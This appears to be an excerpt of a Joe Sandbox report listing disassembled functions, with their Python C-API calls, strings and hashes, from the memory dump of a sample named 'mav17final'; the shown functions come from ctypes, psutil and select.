                                                  • String ID: __ctype_be__$__ctype_le__$_type_ '%s' not supported$cbBhHiIlLdfuzZqQPXOv?g$class must define a '_type_' attribute$class must define a '_type_' attribute which must bea single character string containing one of '%s'.$class must define a '_type_' attribute which must be a string of length 1$class must define a '_type_' string attribute
                                                  • API String ID: 692835343-917751260
                                                  • Opcode ID: 1cbc2b4066554eb2cebf210fbf6479008959c66222fb09b3e1ad465d8608973f
                                                  • Instruction ID: 1d87f1ddec5f56501d5ac426b7caac0b5f51da3f32c30ca3750dc891f8427efb
                                                  • Opcode Fuzzy Hash: 1cbc2b4066554eb2cebf210fbf6479008959c66222fb09b3e1ad465d8608973f
                                                  • Instruction Fuzzy Hash: 0EA13A22A09FC281EA559F6DE8502B977A0FF96BE6F085539DB8E46764DF3CE444C300
                                                  Function 00007FF8B9F646D4 Relevance: 44.0, APIs: 18, Strings: 7, Instructions: 204COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Err_$Object_$AttrLong_LookupMallocMem_String$CallDict_ExceptionMakeMatchesMemoryOccurredSignSsize_tUpdate
                                                  • String ID: The '_length_' attribute is too large$The '_length_' attribute must be an integer$The '_length_' attribute must not be negative$_type_ must have storage info$array too large$class must define a '_length_' attribute$class must define a '_type_' attribute
                                                  • API String ID: 4019195241-504660705
                                                  • Opcode ID: 055b8fc62c60c1bd71026e2f714f2505c56a84889395af57f89967a2e91b601f
                                                  • Instruction ID: 634270bdfec51d0baf61f7afec9ffd18668c844bf19c15327fb3aceac9657643
                                                  • Opcode Fuzzy Hash: 055b8fc62c60c1bd71026e2f714f2505c56a84889395af57f89967a2e91b601f
                                                  • Instruction Fuzzy Hash: AFA14A32A19F8281EA549F2DD89427827A1FF46BF6F186635DB1E463A4DF3CE485C300
                                                  Function 00007FF8B9F6A4C0 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 215COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Number_OccurredSsize_t$FromString$Bytes_Mem_SizeUnicode_$CharCheckFreeIndex_List_MallocMemoryWide
                                                  • String ID: Pointer indices must be integer$slice start is required for step < 0$slice step cannot be zero$slice stop is required
                                                  • API String ID: 3053630023-3059441807
                                                  • Opcode ID: 6979928dfef85d8a828cd9ee037a140b3c1fa3fa22f5c964d232601827984960
                                                  • Instruction ID: 5be0a8a5db7e2d41aa8d1d7b7776f3434023d3b4910e112153e3f8f2a5fcfbc2
                                                  • Opcode Fuzzy Hash: 6979928dfef85d8a828cd9ee037a140b3c1fa3fa22f5c964d232601827984960
                                                  • Instruction Fuzzy Hash: 26915A21B09B8282EA519F1DE65417827A1BF45FF6F4A6631CB2E477E4DF2DE845C300
                                                  Function 00007FF8B9F6C6B4 Relevance: 42.1, APIs: 21, Strings: 3, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$FromLong_$Err_Void$Object_StringUnraisableWrite$ArgsAttrCallFunctionImportImport_InternLongModuleOccurredUnicode_
                                                  • String ID: DllGetClassObject$_ctypes.DllGetClassObject$ctypes
                                                  • API String ID: 375360433-177550262
                                                  • Opcode ID: b5513430baef804698b72f87c032f2232b88aa434da5969d4ce7dec095e12011
                                                  • Instruction ID: 40ad31fb2c8b4824ab53cf7fffd7a2ab4e704593143906b73eec63447a9d2ba6
                                                  • Opcode Fuzzy Hash: b5513430baef804698b72f87c032f2232b88aa434da5969d4ce7dec095e12011
                                                  • Instruction Fuzzy Hash: 7D51D826E09F8285FA949F2AE95823967A0BF46FE6F0C5135DB8E16760DF3CE455C300
                                                  Function 00007FF8B9842260 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 202timethreadnetworkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _PyTime_FromSecondsObject.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B98422BF
                                                  • PyErr_ExceptionMatches.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B98422D3
                                                  • PyErr_SetString.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B984231F
                                                    • Part of subcall function 00007FF8B98425C8: PySequence_Fast.PYTHON311(00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B98425F0
                                                  • _PyDeadline_Init.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B98423DA
                                                  • PyEval_SaveThread.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B984241A
                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842423
                                                  • select.WS2_32 ref: 00007FF8B984243D
                                                  • PyEval_RestoreThread.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842449
                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B984244F
                                                  • PyErr_CheckSignals.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B984245E
                                                  • _PyDeadline_Get.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842479
                                                  • _PyTime_AsTimeval_clamp.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842497
                                                  • PyErr_Occurred.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B98424F2
                                                  • PyTuple_Pack.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842509
                                                  • _Py_Dealloc.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842520
                                                  • _Py_Dealloc.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842534
                                                  • _Py_Dealloc.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842548
                                                  • WSAGetLastError.WS2_32(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B98425AE
                                                  • PyErr_SetExcFromWindowsErr.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B98425C0
                                                    • Part of subcall function 00007FF8B98425C8: PyObject_AsFileDescriptor.PYTHON311(?,?,00007FF8B984224F), ref: 00007FF8B984265C
                                                    • Part of subcall function 00007FF8B98425C8: PyErr_SetString.PYTHON311(?,?,00007FF8B984224F), ref: 00007FF8B98426CA
                                                    • Part of subcall function 00007FF8B98425C8: _Py_Dealloc.PYTHON311(?,?,00007FF8B984224F), ref: 00007FF8B98426D9
                                                    • Part of subcall function 00007FF8B98425C8: _Py_Dealloc.PYTHON311(?,?,00007FF8B984224F), ref: 00007FF8B98426E8
                                                    • Part of subcall function 00007FF8B98425C8: _Py_Dealloc.PYTHON311(?,?,00007FF8B984224F), ref: 00007FF8B98426FE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073245464.00007FF8B9841000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B9840000, based on PE: true
                                                  • Associated: 00000002.00000002.2073221006.00007FF8B9840000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073310530.00007FF8B9845000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9840000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_$Deadline_Eval_FromStringThreadTime__errno$CheckDescriptorErrorExceptionFastFileInitLastMatchesObjectObject_OccurredPackRestoreSaveSecondsSequence_SignalsTimeval_clampTuple_Windowsselect
                                                  • String ID: timeout must be a float or None$timeout must be non-negative
                                                  • API String ID: 1581318368-2150404077
                                                  • Opcode ID: af26c906d80cdcaef9b1c7707cf0177dbe53b8e671061a6009a46fe445b3fcbf
                                                  • Instruction ID: 14f2b975306bad854638afd65850f7da2062ba7c7b54a3366bb699f92e0ede2f
                                                  • Opcode Fuzzy Hash: af26c906d80cdcaef9b1c7707cf0177dbe53b8e671061a6009a46fe445b3fcbf
                                                  • Instruction Fuzzy Hash: 06913C62B08AC396EA619F29E9541BD63A0FF45BD4F404136DB4E4BB98DF3CE545C700
                                                  Function 00007FF8B9F62E40 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Mem_$CallDict_Err_FreeFunctionItemMallocObject_$DeallocErrorFromLong_OccurredStringUnicode_VoidWith
                                                  • String ID: LP_%s$_type_$must be a ctypes type$s(O){sO}$s(O){}
                                                  • API String ID: 2461613936-2311978994
                                                  • Opcode ID: dac97228159b1c0431957491c5f87e729db2124b065f25bc7d08890040e0cdb2
                                                  • Instruction ID: 89e5230678c80e768ebd0b314139007c41386be2df6e2ea4383b1c05d45af229
                                                  • Opcode Fuzzy Hash: dac97228159b1c0431957491c5f87e729db2124b065f25bc7d08890040e0cdb2
                                                  • Instruction Fuzzy Hash: 84510821A19FC782EE559F2DE85417827A4AF5ABF6F082231DB1E567A4DE3CA445C300
                                                  Function 00007FF8B9071A70 Relevance: 36.9, APIs: 12, Strings: 9, Instructions: 124COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf$ErrorLast$OpenProcess
                                                  • String ID: OpenProcess$OpenProcess -> ERROR_INVALID_PARAMETER$OpenProcess -> ERROR_SUCCESS$OpenProcess -> ERROR_SUCCESS turned into AD$OpenProcess -> ERROR_SUCCESS turned into NSP$TerminateProcess$automatically set for PID 0$psutil-debug [%s:%d]> $psutil/arch/windows/process_utils.c
                                                  • API String ID: 1112334068-589840707
                                                  • Opcode ID: b91323493cf4991d72cc5f69666038aa495ed45f80980e8af79a7aa24a3a586c
                                                  • Instruction ID: 660f10dd0ecfc1b3e88e71524751616582b1191a659d26e27cb1d82bfdd8557a
                                                  • Opcode Fuzzy Hash: b91323493cf4991d72cc5f69666038aa495ed45f80980e8af79a7aa24a3a586c
                                                  • Instruction Fuzzy Hash: D0515021F1D5C692EF849F6DF8952B92BA1AF647E0F449036D70D462E5DE2CE487C310
                                                  Function 00007FF8B9072FA0 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 245COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CloseHandle$OpenProcessToken$AccountInformationLookup
                                                  • String ID: (originated from %s)$GetTokenInformation$LookupAccountSidW$LookupAccountSidW -> ERROR_NONE_MAPPED$OpenProcess$OpenProcessToken$automatically set for PID 0
                                                  • API String ID: 87002634-2228157761
                                                  • Opcode ID: ab338031635624e6a2c5c2832eaaf76bfc1081eaa847f19d9c61aacc585fa64b
                                                  • Instruction ID: e58e5074eb583d066ace681e6c21974bed991cdc248560ac36c8660a4c43af2b
                                                  • Opcode Fuzzy Hash: ab338031635624e6a2c5c2832eaaf76bfc1081eaa847f19d9c61aacc585fa64b
                                                  • Instruction Fuzzy Hash: 26B12721B0DAC782FE549F29B8582796BA1BFA5BE1F444035DB4E067A4EF3CE4478710
                                                  Function 00007FF8B9F69798 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 176COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: From$Bytes_Err_Mem_SizeSlice_StringUnicode_$AdjustCharCheckFreeIndex_IndicesList_MallocMemoryNumber_OccurredSsize_tUnpackWide
                                                  • String ID: indices must be integers
                                                  • API String ID: 4188490530-2024404580
                                                  • Opcode ID: e570ecff3f3fa346b7648cae94d04275b3108b85bd0816525fe5c5b16466f0b5
                                                  • Instruction ID: 6de13b959e1744988229e027bd4db27277b8e700f8f380f6a35f5bbd93745bb5
                                                  • Opcode Fuzzy Hash: e570ecff3f3fa346b7648cae94d04275b3108b85bd0816525fe5c5b16466f0b5
                                                  • Instruction Fuzzy Hash: 7A715E25A09FC382EA549F2AD95407867A1FF45BFAB085132DF1E47B96DE3CE885C310
                                                  Function 00007FF8B9071C80 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GetExitCodeProcess$OpenProcess$WaitForSingleObject$WaitForSingleObject() -> WAIT_ABANDONED$WaitForSingleObject() returned WAIT_ABANDONED$WaitForSingleObject() returned WAIT_TIMEOUT$automatically set for PID 0$psutil-debug [%s:%d]> $psutil/_psutil_windows.c
                                                  • API String ID: 0-2011784859
                                                  • Opcode ID: fbe7d8be86f8b85be07ca4f5ecde0da6ed139ace0647608deba24785fe3d89d3
                                                  • Instruction ID: f972b177ffd35f1e062d5dced1a42a7b331387293c6c5dd48332857e872cd513
                                                  • Opcode Fuzzy Hash: fbe7d8be86f8b85be07ca4f5ecde0da6ed139ace0647608deba24785fe3d89d3
                                                  • Instruction Fuzzy Hash: 1E510F25E189C692EE909F29E8541B96BA1BFA4BE0F844032DB5D436A4DF3CE547C740
                                                  Function 00007FF8B9F6D4A0 Relevance: 33.3, APIs: 18, Strings: 1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PyUnicode_FromFormatV.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D4C5
                                                  • PyErr_Fetch.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D4E4
                                                  • PyErr_NormalizeException.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D4F6
                                                  • PyType_GetName.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D50D
                                                  • PyObject_Str.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D515
                                                  • PyUnicode_AppendAndDel.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D527
                                                  • PyUnicode_FromString.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D534
                                                  • PyUnicode_AppendAndDel.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D541
                                                  • PyErr_Clear.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D550
                                                  • PyObject_Str.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D55A
                                                  • PyErr_Clear.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D565
                                                  • PyUnicode_FromString.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D572
                                                  • PyUnicode_AppendAndDel.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D57F
                                                  • PyErr_SetObject.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D594
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D5A9
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D5BE
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D5D3
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D5E8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Unicode_$Err_$Dealloc$AppendFrom$ClearObject_String$ExceptionFetchFormatNameNormalizeObjectType_
                                                  • String ID: ???
                                                  • API String ID: 979652146-1053719742
                                                  • Opcode ID: a0277b81e7bf4beead51eb80468770295d906e45afe09c37c0bcdcee4447fb49
                                                  • Instruction ID: e943524455b8dc462deec382ab112920b4af8d7af4f858e0d089c889faeea006
                                                  • Opcode Fuzzy Hash: a0277b81e7bf4beead51eb80468770295d906e45afe09c37c0bcdcee4447fb49
                                                  • Instruction Fuzzy Hash: 13410662A09E8285EE459F68DC541B827B0AF49BEAF185535CB0E52B64DF3CA845D320
                                                  Function 00007FF8B9F69E68 Relevance: 33.3, APIs: 13, Strings: 6, Instructions: 78threadlibraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$String$DeallocEval_Thread$AddressArg_AttrAuditFormatLong_Object_OccurredParseProcRestoreSaveSizeSys_Tuple_Void
                                                  • String ID: Os:in_dll$_handle$could not convert the _handle attribute to a pointer$ctypes.dlsym$symbol '%s' not found$the _handle attribute of the second argument must be an integer
                                                  • API String ID: 1915345233-3856192562
                                                  • Opcode ID: 7ca03c74892ce7554a02cb8c30f6c35098380688a7c70d2a3342523bcc2a4215
                                                  • Instruction ID: 52e25f89cd49551192c6d03ad898fe681f0d13bda75a6d726745706261349b3c
                                                  • Opcode Fuzzy Hash: 7ca03c74892ce7554a02cb8c30f6c35098380688a7c70d2a3342523bcc2a4215
                                                  • Instruction Fuzzy Hash: DB31EC31A19F8281EA449F2EE8541796BA0FF86FE6F195035DB0E47765DF2CE489C300
                                                  Function 00007FF8B9F6F724 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PyObject_GetAttrString.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F756
                                                  • PySequence_Fast.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F772
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F784
                                                  • PyArg_ParseTuple.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F7E8
                                                  • PyObject_GetAttr.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F802
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F854
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F8D0
                                                  • PyObject_SetAttr.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F8E4
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F8F8
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F917
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F931
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F940
                                                  • PyErr_SetString.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F972
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F983
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$AttrObject_$String$Arg_Err_FastParseSequence_Tuple
                                                  • String ID: OO|O$_fields_$_fields_ must be a sequence$unexpected type
                                                  • API String ID: 1182381414-2418103425
                                                  • Opcode ID: 9a21982e818a441de51ee13329167cb0591f09edfc229330b12a1e4341a6436c
                                                  • Instruction ID: 42d7118b5ffb7d0dc3c19ab1a4ac4f7ff564fa90a382d0645403b19612bb7cb5
                                                  • Opcode Fuzzy Hash: 9a21982e818a441de51ee13329167cb0591f09edfc229330b12a1e4341a6436c
                                                  • Instruction Fuzzy Hash: FB614A72A09F8692EA648F2AE94417967A0FF4ABF2F186135CB5E03764DF3CE455C300
